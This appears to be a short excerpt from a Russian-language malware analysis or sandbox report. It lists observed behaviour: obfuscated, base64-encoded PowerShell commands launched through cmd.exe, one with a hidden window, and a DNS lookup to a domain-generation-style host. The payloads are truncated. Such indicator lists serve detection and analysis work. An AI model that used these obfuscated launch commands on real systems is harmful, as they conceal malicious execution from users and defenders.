Техническая информация
- '<SYSTEM32>\cmd.exe' & /c pOWErshELL -EncODeDCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAegByAFQASwBlAFEASQB4AE8ATgBPAEIAUwBLAHgAZQBPACAAKAAgACQAegB5AEEAVwBuAHMAaQBmAHMAbwBNAEwAdQBwAGcAdwBqAHoAUwB1AE0AdgBmACAALAAgACQAagBEAGMAY...
- DNS ASK a.##dga.me
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncODeDCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAegByAFQASwBlAFEASQB4AE8ATgBPAEIAUwBLAHgAZQBPACAAKAAgACQAegB5AEEAVwBuAHMAaQBmAHMAbwBNAEwAdQBwAGcAdwBqAHoAUwB1AE0AdgBmACAALAAgACQAagBEAGMAYwBuAFMAaABtAHAAT...
- '<SYSTEM32>\cmd.exe' & /c pOWErshELL -EncODeDCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAegByAFQASwBlAFEASQB4AE8ATgBPAEIAUwBLAHgAZQBPACAAKAAgACQAegB5AEEAVwBuAHMAaQBmAHMAbwBNAEwAdQBwAGcAdwBqAHoAUwB1AE0AdgBmACAALAAgACQAagBEAGMAY... (со скрытым окном)